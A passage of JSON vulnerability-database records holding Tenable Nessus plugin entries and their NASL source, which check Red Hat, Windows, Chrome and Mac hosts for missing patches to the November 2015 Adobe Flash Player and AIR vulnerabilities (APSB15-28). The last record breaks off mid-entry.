"2019-11-01T03:21:03", "bulletinFamily": "scanner", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin\nAPSB15-28 listed in the References section, could allow an attacker to\ncreate a specially crafted SWF file that would cause flash-plugin to\ncrash, execute arbitrary code, or disclose sensitive information when\nthe victim loaded a page containing the malicious SWF content.\n(CVE-2015-7651, CVE-2015-7652, CVE-2015-7653, CVE-2015-7654,\nCVE-2015-7655, CVE-2015-7656, CVE-2015-7657, CVE-2015-7658,\nCVE-2015-7659, CVE-2015-7660, CVE-2015-7661, CVE-2015-7662,\nCVE-2015-7663, CVE-2015-8042, CVE-2015-8043, CVE-2015-8044,\nCVE-2015-8046)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.548.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2015-2023.NASL", "href": "https://www.tenable.com/plugins/nessus/86861", "published": "2015-11-12T00:00:00", "title": "RHEL 6 : flash-plugin (RHSA-2015:2023)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2023. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86861);\n script_version(\"2.15\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\", \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\", \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\", \"CVE-2015-7663\", \"CVE-2015-8042\", \"CVE-2015-8043\", \"CVE-2015-8044\", \"CVE-2015-8046\");\n script_xref(name:\"RHSA\", value:\"2015:2023\");\n\n script_name(english:\"RHEL 6 : flash-plugin (RHSA-2015:2023)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin\nAPSB15-28 listed in the References section, could allow an attacker to\ncreate a specially crafted SWF file that would cause flash-plugin to\ncrash, execute arbitrary code, or disclose sensitive information when\nthe victim loaded a page containing the malicious SWF content.\n(CVE-2015-7651, CVE-2015-7652, CVE-2015-7653, CVE-2015-7654,\nCVE-2015-7655, CVE-2015-7656, CVE-2015-7657, CVE-2015-7658,\nCVE-2015-7659, CVE-2015-7660, CVE-2015-7661, CVE-2015-7662,\nCVE-2015-7663, CVE-2015-8042, CVE-2015-8043, CVE-2015-8044,\nCVE-2015-8046)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.548.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7653\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7662\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7658\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8044\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8042\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2023\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.548-1.el6_7\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T02:36:41", "bulletinFamily": "scanner", "description": "The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 19.0.0.226. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A type confusion error exists that allows an attacker to\n execute arbitrary code. (CVE-2015-7659)\n\n - A security bypass vulnerability exists that allows an\n attacker to write arbitrary data to the file system\n under user permissions. (CVE-2015-7662)\n\n - Multiple use-after-free vulnerabilities exist that allow\n an attacker to execute arbitrary code. (CVE-2015-7651,\n CVE-2015-7652, CVE-2015-7653, CVE-2015-7654,\n CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\n CVE-2015-7658, CVE-2015-7660, CVE-2015-7661,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046)", "modified": "2019-11-02T00:00:00", "id": "FLASH_PLAYER_APSB15-28.NASL", "href": "https://www.tenable.com/plugins/nessus/86851", "published": "2015-11-11T00:00:00", "title": "Adobe Flash Player <= 19.0.0.226 Multiple Vulnerabilities (APSB15-28)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86851);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-7651\",\n \"CVE-2015-7652\",\n \"CVE-2015-7653\",\n \"CVE-2015-7654\",\n \"CVE-2015-7655\",\n \"CVE-2015-7656\",\n \"CVE-2015-7657\",\n \"CVE-2015-7658\",\n \"CVE-2015-7659\",\n \"CVE-2015-7660\",\n \"CVE-2015-7661\",\n \"CVE-2015-7662\",\n \"CVE-2015-7663\",\n \"CVE-2015-8042\",\n \"CVE-2015-8043\",\n \"CVE-2015-8044\",\n \"CVE-2015-8046\"\n );\n\n script_name(english:\"Adobe Flash Player <= 19.0.0.226 Multiple Vulnerabilities (APSB15-28)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 19.0.0.226. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A type confusion error exists that allows an attacker to\n execute arbitrary code. (CVE-2015-7659)\n\n - A security bypass vulnerability exists that allows an\n attacker to write arbitrary data to the file system\n under user permissions. (CVE-2015-7662)\n\n - Multiple use-after-free vulnerabilities exist that allow\n an attacker to execute arbitrary code. (CVE-2015-7651,\n CVE-2015-7652, CVE-2015-7653, CVE-2015-7654,\n CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\n CVE-2015-7658, CVE-2015-7660, CVE-2015-7661,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 19.0.0.245 or later.\n\nAlternatively, Adobe has made version 18.0.0.261 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8046\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 19.0.0.226\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"19.0.0.226\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 18.0.0.255\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"18.0.0.255\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 19 <= 19.0.0.226\n if(variant != \"Chrome_Pepper\" &&\n ver =~ \"^(?:19|[2-9]\\d)\\.\" &&\n ver_compare(ver:ver,fix:\"19.0.0.226\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"19.0.0.245 / 18.0.0.261\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"19.0.0.245 / 18.0.0.261\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 19.0.0.245\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 19.0.0.245 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' option was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T02:12:36", "bulletinFamily": "scanner", "description": "The version of Adobe AIR installed on the remote Windows host is equal\nor prior to version 19.0.0.241. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A type confusion error exists that allows an attacker to\n execute arbitrary code. (CVE-2015-7659)\n\n - A security bypass vulnerability exists that allows an\n attacker to write arbitrary data to the file system\n under user permissions. (CVE-2015-7662)\n\n - Multiple use-after-free vulnerabilities exist that allow\n an attacker to execute arbitrary code. (CVE-2015-7651,\n CVE-2015-7652, CVE-2015-7653, CVE-2015-7654,\n CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\n CVE-2015-7658, CVE-2015-7660, CVE-2015-7661,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046)", "modified": "2019-11-02T00:00:00", "id": "ADOBE_AIR_APSB15-28.NASL", "href": "https://www.tenable.com/plugins/nessus/86850", "published": "2015-11-11T00:00:00", "title": "Adobe AIR <= 19.0.0.213 Multiple Vulnerabilities (APSB15-28)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86850);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-7651\",\n \"CVE-2015-7652\",\n \"CVE-2015-7653\",\n \"CVE-2015-7654\",\n \"CVE-2015-7655\",\n \"CVE-2015-7656\",\n \"CVE-2015-7657\",\n \"CVE-2015-7658\",\n \"CVE-2015-7659\",\n \"CVE-2015-7660\",\n \"CVE-2015-7661\",\n \"CVE-2015-7662\",\n \"CVE-2015-7663\",\n \"CVE-2015-8042\",\n \"CVE-2015-8043\",\n \"CVE-2015-8044\",\n \"CVE-2015-8046\"\n );\n\n script_name(english:\"Adobe AIR <= 19.0.0.213 Multiple Vulnerabilities (APSB15-28)\");\n script_summary(english:\"Checks the version of AIR.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe AIR installed on the remote Windows host is equal\nor prior to version 19.0.0.241. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A type confusion error exists that allows an attacker to\n execute arbitrary code. (CVE-2015-7659)\n\n - A security bypass vulnerability exists that allows an\n attacker to write arbitrary data to the file system\n under user permissions. (CVE-2015-7662)\n\n - Multiple use-after-free vulnerabilities exist that allow\n an attacker to execute arbitrary code. (CVE-2015-7651,\n CVE-2015-7652, CVE-2015-7653, CVE-2015-7654,\n CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\n CVE-2015-7658, CVE-2015-7660, CVE-2015-7661,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR version 19.0.0.241 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8046\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '19.0.0.213';\nfix = '19.0.0.241';\nfix_ui = '19.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T02:43:50", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 46.0.2490.86. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists in the\n PDF viewer that allows an attacker to disclose sensitive\n information. (CVE-2015-1302)\n\n - A type confusion error exists that allows an attacker to\n execute arbitrary code. (CVE-2015-7659)\n\n - A security bypass vulnerability exists that allows an\n attacker to write arbitrary data to the file system\n under user permissions. (CVE-2015-7662)\n\n - Multiple use-after-free vulnerabilities exist that allow\n an attacker to execute arbitrary code. (CVE-2015-7651,\n CVE-2015-7652, CVE-2015-7653, CVE-2015-7654,\n CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\n CVE-2015-7658, CVE-2015-7660, CVE-2015-7661,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046)", "modified": "2019-11-02T00:00:00", "id": "GOOGLE_CHROME_46_0_2490_86.NASL", "href": "https://www.tenable.com/plugins/nessus/86852", "published": "2015-11-11T00:00:00", "title": "Google Chrome < 46.0.2490.86 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86852);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-1302\",\n \"CVE-2015-7651\",\n \"CVE-2015-7652\",\n \"CVE-2015-7653\",\n \"CVE-2015-7654\",\n \"CVE-2015-7655\",\n \"CVE-2015-7656\",\n \"CVE-2015-7657\",\n \"CVE-2015-7658\",\n \"CVE-2015-7659\",\n \"CVE-2015-7660\",\n \"CVE-2015-7661\",\n \"CVE-2015-7662\",\n \"CVE-2015-7663\",\n \"CVE-2015-8042\",\n \"CVE-2015-8043\",\n \"CVE-2015-8044\",\n \"CVE-2015-8046\"\n );\n\n script_name(english:\"Google Chrome < 46.0.2490.86 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 46.0.2490.86. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists in the\n PDF viewer that allows an attacker to disclose sensitive\n information. (CVE-2015-1302)\n\n - A type confusion error exists that allows an attacker to\n execute arbitrary code. (CVE-2015-7659)\n\n - A security bypass vulnerability exists that allows an\n attacker to write arbitrary data to the file system\n under user permissions. (CVE-2015-7662)\n\n - Multiple use-after-free vulnerabilities exist that allow\n an attacker to execute arbitrary code. (CVE-2015-7651,\n CVE-2015-7652, CVE-2015-7653, CVE-2015-7654,\n CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\n CVE-2015-7658, CVE-2015-7660, CVE-2015-7661,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046)\");\n # http://googlechromereleases.blogspot.com/2015/11/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f6a84f7c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 46.0.2490.86 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8046\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'46.0.2490.86', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T02:51:36", "bulletinFamily": "scanner", "description": "The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 19.0.0.226. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A type confusion error exists that allows an attacker to\n execute arbitrary code. (CVE-2015-7659)\n\n - A security bypass vulnerability exists that allows an\n attacker to write arbitrary data to the file system\n under user permissions. (CVE-2015-7662)\n\n - Multiple use-after-free vulnerabilities exist that allow\n an attacker to execute arbitrary code. (CVE-2015-7651,\n CVE-2015-7652, CVE-2015-7653, CVE-2015-7654,\n CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\n CVE-2015-7658, CVE-2015-7660, CVE-2015-7661,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046)", "modified": "2019-11-02T00:00:00", "id": "MACOSX_FLASH_PLAYER_APSB15-28.NASL", "href": "https://www.tenable.com/plugins/nessus/86854", "published": "2015-11-11T00:00:00", "title": "Adobe Flash Player for Mac <= 19.0.0.226 Multiple Vulnerabilities (APSB15-28)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86854);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-7651\",\n \"CVE-2015-7652\",\n \"CVE-2015-7653\",\n \"CVE-2015-7654\",\n \"CVE-2015-7655\",\n \"CVE-2015-7656\",\n \"CVE-2015-7657\",\n \"CVE-2015-7658\",\n \"CVE-2015-7659\",\n \"CVE-2015-7660\",\n \"CVE-2015-7661\",\n \"CVE-2015-7662\",\n \"CVE-2015-7663\",\n \"CVE-2015-8042\",\n \"CVE-2015-8043\",\n \"CVE-2015-8044\",\n \"CVE-2015-8046\"\n );\n\n script_name(english:\"Adobe Flash Player for Mac <= 19.0.0.226 Multiple Vulnerabilities 